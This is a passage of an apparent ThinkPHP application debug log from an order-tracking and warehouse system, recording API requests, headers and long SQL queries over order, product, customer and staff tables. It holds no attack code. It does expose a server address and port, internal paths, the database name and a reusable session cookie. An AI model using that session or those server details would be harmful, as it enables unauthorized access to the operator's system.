`orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,parentproductinfo.id AS parentproductinfo__id,parentproductinfo.product_avatar AS parentproductinfo__product_avatar,parentproductinfo.name AS parentproductinfo__name,parentproductinfo.product_num AS parentproductinfo__product_num,parentproductinfo.kucun AS parentproductinfo__kucun,parentproductinfo.takeup_kucun AS parentproductinfo__takeup_kucun,parentproductinfo.staff_ids AS parentproductinfo__staff_ids,parentproductinfo.staff_names AS parentproductinfo__staff_names,parentproductinfo.pid AS parentproductinfo__pid,parentproductinfo.corresponding_num AS parentproductinfo__corresponding_num,parentproductinfo.position AS parentproductinfo__position,parentproductinfo.price AS parentproductinfo__price,parentproductinfo.factorymge_id AS parentproductinfo__factorymge_id,parentproductinfo.product_status AS parentproductinfo__product_status,parentproductinfo.admin_id AS parentproductinfo__admin_id,parentproductinfo.createtime AS parentproductinfo__createtime,parentproductinfo.updatetime AS parentproductinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `orderinfo`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_productinfo` `parentproductinfo` ON `orderinfo`.`pProductinfo_id`=`parentproductinfo`.`id` WHERE `orderinfo`.`pid` = '53632' AND ( order_status!= '6' ) [ RunTime:0.063287s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_purchaseorder` [ RunTime:0.001043s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.000826s ] [ sql ] [ SQL ] SELECT `purchaseorder`.`id`,`purchaseorder`.`number`,`purchaseorder`.`supplier_factory_id`,`purchaseorder`.`sup_order_id`,`purchaseorder`.`material_id`,`purchaseorder`.`orderinfo_id`,`purchaseorder`.`order_amount`,`purchaseorder`.`kucun_amount`,`purchaseorder`.`amount`,`purchaseorder`.`lingqu_amount`,`purchaseorder`.`daohuo_amount`,`purchaseorder`.`price`,`purchaseorder`.`suppliercustomer_id`,`purchaseorder`.`factorymge_id`,`purchaseorder`.`admin_id`,`purchaseorder`.`order_status`,`purchaseorder`.`build_time`,`purchaseorder`.`remind_day`,`purchaseorder`.`end_time`,`purchaseorder`.`responsible_staffinfos`,`purchaseorder`.`responsible_staffinfovars`,`purchaseorder`.`bind_pro_id`,`purchaseorder`.`bind_mat_id`,`purchaseorder`.`beizhu`,`purchaseorder`.`feedback`,`purchaseorder`.`order_type`,`purchaseorder`.`guoqitime`,`purchaseorder`.`guoqi_status`,`purchaseorder`.`createtime`,`purchaseorder`.`updatetime`,`purchaseorder`.`is_modify`,material.id AS material__id,material.name AS material__name,material.number AS material__number,material.avatar AS material__avatar,material.amount AS material__amount,material.warn_amount AS material__warn_amount,material.occupy_amount AS material__occupy_amount,material.factorymge_id AS material__factorymge_id,material.is_stop_status AS material__is_stop_status,material.admin_id AS material__admin_id,material.price AS material__price,material.danwei AS material__danwei,material.quehuo_status AS material__quehuo_status,material.put_position AS material__put_position,material.is_has_sup AS material__is_has_sup,material.staff_ids AS material__staff_ids,material.staff_names AS material__staff_names,material.createtime AS material__createtime,material.updatetime AS material__updatetime,material.is_delete AS material__is_delete,bindmaterial.id AS bindmaterial__id,bindmaterial.name AS bindmaterial__name,bindmaterial.number AS bindmaterial__number,bindmaterial.avatar AS bindmaterial__avatar,bindmaterial.amount AS bindmaterial__amount,bindmaterial.warn_amount AS bindmaterial__warn_amount,bindmaterial.occupy_amount AS bindmaterial__occupy_amount,bindmaterial.factorymge_id AS bindmaterial__factorymge_id,bindmaterial.is_stop_status AS bindmaterial__is_stop_status,bindmaterial.admin_id AS bindmaterial__admin_id,bindmaterial.price AS bindmaterial__price,bindmaterial.danwei AS bindmaterial__danwei,bindmaterial.quehuo_status AS bindmaterial__quehuo_status,bindmaterial.put_position AS bindmaterial__put_position,bindmaterial.is_has_sup AS bindmaterial__is_has_sup,bindmaterial.staff_ids AS bindmaterial__staff_ids,bindmaterial.staff_names AS bindmaterial__staff_names,bindmaterial.createtime AS bindmaterial__createtime,bindmaterial.updatetime AS bindmaterial__updatetime,bindmaterial.is_delete AS bindmaterial__is_delete,bindproduct.id AS bindproduct__id,bindproduct.product_avatar AS bindproduct__product_avatar,bindproduct.name AS bindproduct__name,bindproduct.product_num AS bindproduct__product_num,bindproduct.kucun AS bindproduct__kucun,bindproduct.takeup_kucun AS bindproduct__takeup_kucun,bindproduct.staff_ids AS bindproduct__staff_ids,bindproduct.staff_names AS bindproduct__staff_names,bindproduct.pid AS bindproduct__pid,bindproduct.corresponding_num AS bindproduct__corresponding_num,bindproduct.position AS bindproduct__position,bindproduct.price AS bindproduct__price,bindproduct.factorymge_id AS bindproduct__factorymge_id,bindproduct.product_status AS bindproduct__product_status,bindproduct.admin_id AS bindproduct__admin_id,bindproduct.createtime AS bindproduct__createtime,bindproduct.updatetime AS bindproduct__updatetime FROM `ot_purchaseorder` `purchaseorder` LEFT JOIN `ot_material` `material` ON `purchaseorder`.`material_id`=`material`.`id` LEFT JOIN `ot_material` `bindmaterial` ON `purchaseorder`.`bind_mat_id`=`bindmaterial`.`id` LEFT JOIN `ot_productinfo` `bindproduct` ON `purchaseorder`.`bind_pro_id`=`bindproduct`.`id` WHERE `orderinfo_id` = 53632 AND `order_status` IN (1,2) AND `order_type` = 4 [ RunTime:0.000771s ] [ sql ] [ SQL ] UPDATE `ot_orderinfo` SET `produced_amount`=21,`waste_amount`=0,`produced_time`=1765701502,`order_status`='3',`updatetime`=1765701502 WHERE `id` = 53632 [ RunTime:0.000516s ] --------------------------------------------------------------- [ 2025-12-14T16:38:22+08:00 ] 39.144.91.198 POST /api/kuguan/order/getnotruorderbuid?staff_id=24&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=24&offset=0&pageNum=10 [运行时间:0.074612s][吞吐率:13.40req/s] [内存消耗:4,770.27kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001263s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001518s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000472s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000950s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000349s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001130s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000851s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1765701502>orderinfo.end_time desc,1765701502>orderinfo.end_time desc,1765701502-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 0,10 [ RunTime:0.026084s ] --------------------------------------------------------------- [ 2025-12-14T16:38:22+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=0&pageNum=10 [运行时间:0.081292s][吞吐率:12.30req/s] [内存消耗:5,464.64kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001331s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001543s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000458s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000990s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000781s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000467s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001066s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000797s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2','3') ) AND ( productinfo.kucun+orderinfo.produced_amount-orderinfo.send_amount > 0 ) AND `orderinfo`.`pid` = 0 AND ( orderinfo.kehu_id != 0 ) AND ( 1=1 ) AND ( 1=1 ) ORDER BY `orderinfo`.`updatetime` ASC LIMIT 0,10 [ RunTime:0.024654s ] --------------------------------------------------------------- [ 2025-12-14T16:38:23+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021133s][吞吐率:47.32req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001407s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:23+08:00 ] 39.144.91.198 POST /api/kuguan/order/getnotruorderbuid?staff_id=24&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/kuguan/order/getnotruorderbuid?staff_id=24&offset=1&pageNum=10 [运行时间:0.073051s][吞吐率:13.69req/s] [内存消耗:4,757.88kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001228s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kuguan.order', 2 => 'getnotruorderbuid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001645s ] [ info ] [ RUN ] app\api\controller\kuguan\Order->getnotruorderbuid[ /alidata/www/gendan/application/api/controller/kuguan/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000536s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000916s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 24 LIMIT 1 [ RunTime:0.000516s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001060s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000725s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`pid` = 0 AND `orderinfo`.`factorymge_id` = 26 AND ( orderinfo.order_status in ('1','2') ) AND ( orderinfo.order_type in ('1','2','3') ) AND ( `productinfo`.`name` LIKE '%%' OR `responsible_staffinfovars` LIKE '%%' ) AND ( orderinfo.produce_amount > 0 ) ORDER BY 1765701503>orderinfo.end_time desc,1765701503>orderinfo.end_time desc,1765701503-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 10,10 [ RunTime:0.025347s ] --------------------------------------------------------------- [ 2025-12-14T16:38:23+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021513s][吞吐率:46.48req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001167s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:25+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019924s][吞吐率:50.19req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:38:25+08:00 ] 39.144.91.198 POST /api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=1&pageNum=10 [ info ] 47.105.33.115:8081/api/order/getrukuorderbyid?staff_id=24&orderStr=&offset=1&pageNum=10 [运行时间:0.074584s][吞吐率:13.41req/s] [内存消耗:5,456.40kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001119s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'order', 2 => 'getrukuorderbyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '24', 'orderStr' => '', 'offset' => '1', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001511s ] [ info ] [ RUN ] app\api\controller\Order->getrukuorderbyid[ /alidata/www/gendan/application/api/controller/Order.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000412s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000859s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000691s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '24' LIMIT 1 [ RunTime:0.000402s ] [ sql ] [ SQL ] SHOW COLUMNS FROM 